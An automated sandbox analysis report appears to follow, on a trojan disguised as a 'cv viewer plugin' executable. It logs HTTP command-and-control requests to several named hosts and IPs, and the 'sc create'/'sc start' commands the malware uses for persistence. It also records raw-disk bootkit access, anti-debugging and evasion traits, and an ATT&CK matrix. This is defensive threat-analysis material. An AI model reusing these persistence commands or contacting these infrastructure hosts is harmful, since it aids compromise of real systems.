        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /rand HTTP/1.1Host: 31.214.157.226Accept: */*
        Source: global trafficHTTP traffic detected: GET /rand HTTP/1.1Host: 31.214.157.226Accept: */*
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1Host: dddlhyt.infoUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficDNS traffic detected: DNS query: dddlhyt.info
        Source: cv viewer plugin 8.31.40.exe, 00000007.00000002.2648250801.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, cv viewer plugin 8.31.40.exe, 00000007.00000002.2648534705.0000000002396000.00000004.00000020.00020000.00000000.sdmp, cv viewer plugin 8.31.40.exe, 00000007.00000002.2648485900.000000000228A000.00000004.00000020.00020000.00000000.sdmp, cv viewer plugin 8.31.40.exe, 00000007.00000002.2644409140.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.214/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834
        Source: cv viewer plugin 8.31.40.exe, 00000007.00000002.2644409140.0000000000B89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.214/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df1
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_00401A4F: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification,7_2_00401A4F
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_00406C477_2_00406C47
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_004010517_2_00401051
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_00401C267_2_00401C26
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016AF07A7_2_016AF07A
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016BE24D7_2_016BE24D
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016BDD597_2_016BDD59
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016B85037_2_016B8503
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016C54607_2_016C5460
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016BACFA7_2_016BACFA
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016B9F447_2_016B9F44
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016BE6657_2_016BE665
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016C2E747_2_016C2E74
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016C4EE97_2_016C4EE9
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DBF317_2_016DBF31
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DBF807_2_016DBF80
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: String function: 016C53F0 appears 139 times
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: String function: 016B8BA0 appears 37 times
        Source: cv viewer plugin 8.31.40.exe, 00000007.00000000.1416621407.0000000000658000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCV viewer pluginB vs cv viewer plugin 8.31.40.exe
        Source: cv viewer plugin 8.31.40.exeBinary or memory string: OriginalFilenameCV viewer pluginB vs cv viewer plugin 8.31.40.exe
        Source: cv viewer plugin 8.31.40.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: cv viewer plugin 8.31.40.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@9/6@1/3
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016B0978 FormatMessageA,GetLastError,7_2_016B0978
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: CreateServiceA,CloseServiceHandle,7_2_00402867
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_00401F64 FindResourceA,GetLastError,SizeofResource,LoadResource,LockResource,GlobalAlloc,GetTickCount,GlobalAlloc,7_2_00401F64
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_0040D274 StartServiceCtrlDispatcherA,7_2_0040D274
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_0040D274 StartServiceCtrlDispatcherA,7_2_0040D274
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_0040D458 StartServiceCtrlDispatcherA,7_2_0040D458
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
        Source: C:\Windows\SysWOW64\sc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: cv viewer plugin 8.31.40.exeVirustotal: Detection: 36%
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" >> C:\servicereg.log 2>&1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe"
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c sc start zuYSo >> C:\servicestart.log 2>&1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start zuYSo
        Source: unknownProcess created: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start zuYSoJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EC529B00-1A1F-11D1-BAD9-00609744111A}\InprocServer32Jump to behavior
        Source: cv viewer plugin 8.31.40.exeStatic file information: File size 3665662 > 1048576
        Source: cv viewer plugin 8.31.40.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x191000
        Source: cv viewer plugin 8.31.40.exeStatic PE information: Raw size of .vhead9 is bigger than: 0x100000 < 0x127efe

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeUnpacked PE file: 7.2.cv viewer plugin 8.31.40.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.vhead9:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeUnpacked PE file: 7.2.cv viewer plugin 8.31.40.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_00401B4B LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,7_2_00401B4B
        Source: cv viewer plugin 8.31.40.exeStatic PE information: section name: .vhead9
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_0040DA29 push es; ret 7_2_0040DA2C
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_00402D40 push eax; ret 7_2_00402D6E
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_0040B708 push eax; ret 7_2_0040B6B9
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_0040B58C push eax; ret 7_2_0040B6B9
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016B8BE5 push ecx; ret 7_2_016B8BF8
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016C53F0 push eax; ret 7_2_016C540E
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016C544B push ecx; ret 7_2_016C545B
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016AEF92 push ss; iretd 7_2_016AEF93
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016F99F2 push ecx; mov dword ptr [esp], 5025CA0Fh7_2_017347F2
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016F99F2 push 3AA6D972h; mov dword ptr [esp], ecx7_2_0173482D
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016F99F2 push 2C9DFE2Bh; mov dword ptr [esp], esi7_2_01734850
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DF87F push ebx; mov dword ptr [esp], edi7_2_016E7293
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DF87F push ebx; mov dword ptr [esp], ecx7_2_016E72BE
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DF87F push ecx; mov dword ptr [esp], edx7_2_016E72D9
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DF87F push edi; mov dword ptr [esp], ebp7_2_01729D38
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016E2599 push 30644033h; mov dword ptr [esp], edi7_2_016E25A7
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016E2599 push edi; mov dword ptr [esp], ebx7_2_016E25B7
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016E2599 push edx; mov dword ptr [esp], ebp7_2_016E25CF
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016E2599 push edx; mov dword ptr [esp], esp7_2_016E260A
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DE4EE push ecx; mov dword ptr [esp], ebx7_2_0171BACC
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_017094D7 push ebp; mov dword ptr [esp], ebx7_2_01719287
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DE0F9 push eax; mov dword ptr [esp], edx7_2_016DE114
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DE0F9 push ebp; mov dword ptr [esp], esi7_2_016DE14F
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DE0F9 push esi; mov dword ptr [esp], edx7_2_016DE189
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DE0D2 push ebx; mov dword ptr [esp], 6C8B564Dh7_2_016DE0DE
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DE0D2 push eax; mov dword ptr [esp], edx7_2_016DE114
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DE0D2 push ebp; mov dword ptr [esp], esi7_2_016DE14F
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DE0D2 push esi; mov dword ptr [esp], edx7_2_016DE189
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016DEDDA push esi; retf 7_2_016DEDDB
        Source: cv viewer plugin 8.31.40.exeStatic PE information: section name: .text entropy: 7.682929718305509

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive07_2_00401A4F
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive07_2_016AF8A3

        Boot Survival

        barindex
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive07_2_00401A4F
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive07_2_016AF8A3
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_0040D274 StartServiceCtrlDispatcherA,7_2_0040D274
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe"

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 2023 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 2023
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016B8503 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_016B8503
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,7_2_00401B4B
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,7_2_016AF9A7
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeWindow / User API: threadDelayed 759Jump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeWindow / User API: threadDelayed 9095Jump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_7-18807
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe TID: 7368Thread sleep count: 759 > 30Jump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe TID: 7368Thread sleep time: -1518000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe TID: 6332Thread sleep count: 74 > 30Jump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe TID: 6332Thread sleep time: -4440000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe TID: 7368Thread sleep count: 9095 > 30Jump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe TID: 7368Thread sleep time: -18190000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeThread delayed: delay time: 60000Jump to behavior
        Source: cv viewer plugin 8.31.40.exe, 00000007.00000002.2644409140.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH`
        Source: cv viewer plugin 8.31.40.exe, 00000007.00000002.2644409140.0000000000B92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeAPI call chain: ExitProcess graph end nodegraph_7-18808
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeAPI call chain: ExitProcess graph end nodegraph_7-21788

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_7-18993
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016C01BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_016C01BE
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016C01BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_016C01BE
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_00401B4B LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,7_2_00401B4B
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016A6487 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,7_2_016A6487
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016B9528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_016B9528
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create zuYSo binpath= "C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start zuYSoJump to behavior
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_016B806E cpuid 7_2_016B806E
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_00402715 GetLocalTime,7_2_00402715
        Source: C:\Users\user\Desktop\cv viewer plugin 8.31.40.exeCode function: 7_2_00402EB0 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,7_2_00402EB0

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2645068946.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: cv viewer plugin 8.31.40.exe PID: 7320, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2645068946.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: cv viewer plugin 8.31.40.exe PID: 7320, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Service Execution
        5
        Windows Service
        5
        Windows Service
        121
        Virtualization/Sandbox Evasion
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Native API
        1
        Bootkit
        11
        Process Injection
        11
        Process Injection
        LSASS Memory141
        Security Software Discovery
        Remote Desktop ProtocolData from Removable Media11
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        Security Account Manager121
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Bootkit
        LSA Secrets1
        Remote System Discovery
        SSHKeylogging12
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
        Software Packing
        Cached Domain Credentials1
        System Network Configuration Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading
        DCSync23
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1502272 Sample: cv viewer plugin 8.31.40.exe Startdate: 31/08/2024 Architecture: WINDOWS Score: 100 30 Suricata IDS alerts for network traffic 2->30 32 Multi AV Scanner detection for submitted file 2->32 34 Detected unpacking (changes PE section rights) 2->34 36 8 other signatures 2->36 6 cmd.exe 2 2->6         started        9 cv viewer plugin 8.31.40.exe 17 2->9         started        12 cmd.exe 2 2->12         started        process3 dnsIp4 22 C:\servicereg.log, ASCII 6->22 dropped 14 conhost.exe 6->14         started        16 sc.exe 1 6->16         started        24 dddlhyt.info 185.196.8.214, 49720, 49721, 49722 SIMPLECARRER2IT Switzerland 9->24 26 31.214.157.226, 49792, 80 RACKPLACEDE Germany 9->26 28 89.105.201.183, 2023, 49765, 49767 NOVOSERVE-ASNL Netherlands 9->28 18 conhost.exe 12->18         started        20 sc.exe 1 12->20         started        file5 process6

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        cv viewer plugin 8.31.40.exe36%VirustotalBrowse
        cv viewer plugin 8.31.40.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://dddlhyt.info/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef920%Avira URL Cloudsafe
        http://185.196.8.214/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec968340%Avira URL Cloudsafe
        http://dddlhyt.info/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd680%Avira URL Cloudsafe
        http://185.196.8.214/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df10%Avira URL Cloudsafe
        http://31.214.157.226/rand0%Avira URL Cloudsafe
        http://31.214.157.226/rand0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        dddlhyt.info
        185.196.8.214
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
